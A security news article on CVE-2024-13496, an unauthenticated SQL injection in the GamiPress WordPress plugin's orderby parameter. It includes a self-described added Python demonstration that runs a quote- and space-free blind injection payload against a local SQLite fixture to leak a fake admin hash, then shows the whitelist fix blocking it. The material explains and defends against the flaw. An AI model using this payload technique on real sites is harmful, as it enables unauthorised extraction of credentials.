WordPress plugin vulnerability exposes websites to SQL injection



A high-severity vulnerability in the popular WordPress plugin GamiPress, tracked as CVE-2024-13496, allows unauthenticated SQL injection and carries a CVSS 3.1 base score of 7.5 (High).

The flaw was discovered during a security assessment of version 7.2.1 and affects all versions up to and including 7.3.1, so site owners running any of those releases should update to the latest secure version.

WordPress plugin vulnerability

According to researcher Abrahack, the vulnerable code is reached through a wp_ajax_nopriv_{$action} hook. WordPress runs these hooks for requests from visitors who are not logged in, so no authentication is needed to reach the affected handler.

The gamipress_get_logs AJAX action is the affected endpoint: it retrieves user logs and accepts request parameters that shape the resulting database query.

Its handler, gamipress_ajax_get_logs, passes the raw $_REQUEST array to gamipress_logs_shortcode, which in turn builds and runs the query through gamipress_logs_shortcode_query and the CT_Query class.

The injection point is the orderby request parameter, which ends up in the ORDER BY clause of the SQL query without adequate sanitisation.

The value is lightly filtered (whitespace is stripped and quotes are not allowed), but that is not enough: an ORDER BY column cannot be bound as a prepared-statement parameter, so the filter is the only defence, and a payload that uses neither spaces nor quotes passes through it unchanged.

A time-based blind SQL injection payload was used to demonstrate the issue: the attacker asks the database a yes/no question and reads the answer from the response delay, inferring database contents even though no data is returned in the response itself.

The vendor fixed the issue in version 7.3.2 by whitelisting the orderby parameter: only predefined column names of the gamipress_logs table are accepted, so arbitrary SQL can no longer reach the query.
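As an added illustration (this is not code from the page, from the GamiPress plugin, or from Abrahack's report), the following Python script models the flaw and the fix against an in-memory SQLite database. The table layout, the rows, the fake admin hash and the two sanitisers are constructed assumptions, and it uses a boolean ordering oracle (SQLite has no SLEEP()) rather than the MySQL time-based payload the researcher used. The bypass mechanism is the same: a payload that contains no whitespace and no quotes survives a filter that only strips those characters, while a column whitelist neutralises it.

```python
import re
import sqlite3

# Constructed fixture (not the plugin's real schema) so the example runs offline.
# The hash is a fake value with a phpass-style "$P$" prefix.
SCHEMA = """
CREATE TABLE gamipress_logs (log_id INTEGER PRIMARY KEY, title TEXT, type TEXT);
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO gamipress_logs VALUES (1, 'Earned badge', 'achievement_earn');
INSERT INTO gamipress_logs VALUES (2, 'Visited post', 'points_award');
INSERT INTO gamipress_logs VALUES (3, 'Reached rank', 'rank_earn');
INSERT INTO wp_users VALUES (1, 'admin', '$P$BexampleHashNotReal000000000');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def strip_only(orderby):
    """Model of an insufficient sanitiser (assumption, simplified): drop
    whitespace and quote characters, then still interpolate the value."""
    return re.sub(r"[\s'\"`]", "", orderby)


# Model of the 7.3.2-style fix: only known column names are accepted,
# anything else falls back to a fixed default column.
LOGS_COLUMNS = ("log_id", "title", "type")


def whitelist(orderby, default="log_id"):
    return orderby if orderby in LOGS_COLUMNS else default


def fetch_log_ids(conn, orderby, sanitise):
    # ORDER BY cannot take a bound parameter, so the sanitiser is the only defence.
    sql = f"SELECT log_id FROM gamipress_logs ORDER BY {sanitise(orderby)}"
    return [row[0] for row in conn.execute(sql)]


def oracle_payload(code_point):
    """Boolean oracle with no whitespace and no quotes: /**/ stands in for
    spaces and unicode()/substr() avoid string literals. If the first
    character of the admin hash has the guessed code point, rows come back
    ascending by log_id; otherwise descending."""
    return (
        "(CASE/**/WHEN/**/unicode(substr((SELECT/**/user_pass/**/FROM/**/"
        f"wp_users/**/WHERE/**/ID=1),1,1))={code_point}/**/THEN/**/log_id"
        "/**/ELSE/**/-log_id/**/END)"
    )


def infer_first_char(conn, sanitise):
    """Drive the oracle over printable ASCII. Returns the single character
    whose guess produces the ascending order, or None when every guess
    gives the same order (the sanitiser neutralised the payload)."""
    hits = [
        chr(cp)
        for cp in range(32, 127)
        if fetch_log_ids(conn, oracle_payload(cp), sanitise) == [1, 2, 3]
    ]
    return hits[0] if len(hits) == 1 else None


if __name__ == "__main__":
    db = open_db()
    print("strip-only sanitiser leaks:", infer_first_char(db, strip_only))
    print("whitelist sanitiser leaks:", infer_first_char(db, whitelist))
```

With the strip-only filter the script recovers the first character of the stored hash one yes/no question at a time, which is exactly the inference the time-based payload performs on MySQL using delays instead of row order; with the whitelist the payload is replaced by the default column and every query returns the same order, so there is nothing to infer.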

The case underlines the need to validate user input in WordPress plugins, especially values such as column names that cannot be protected by prepared statements. Site owners should update GamiPress to version 7.3.2 or later.

By FirstHackersNews | March 24th, 2025 (2025-03-26T02:10:50+05:30) | Internet Security, Malware, Security Advisory, Security Update, vulnerability, wordpress

About the Author:

FirstHackersNews- Identifies Security
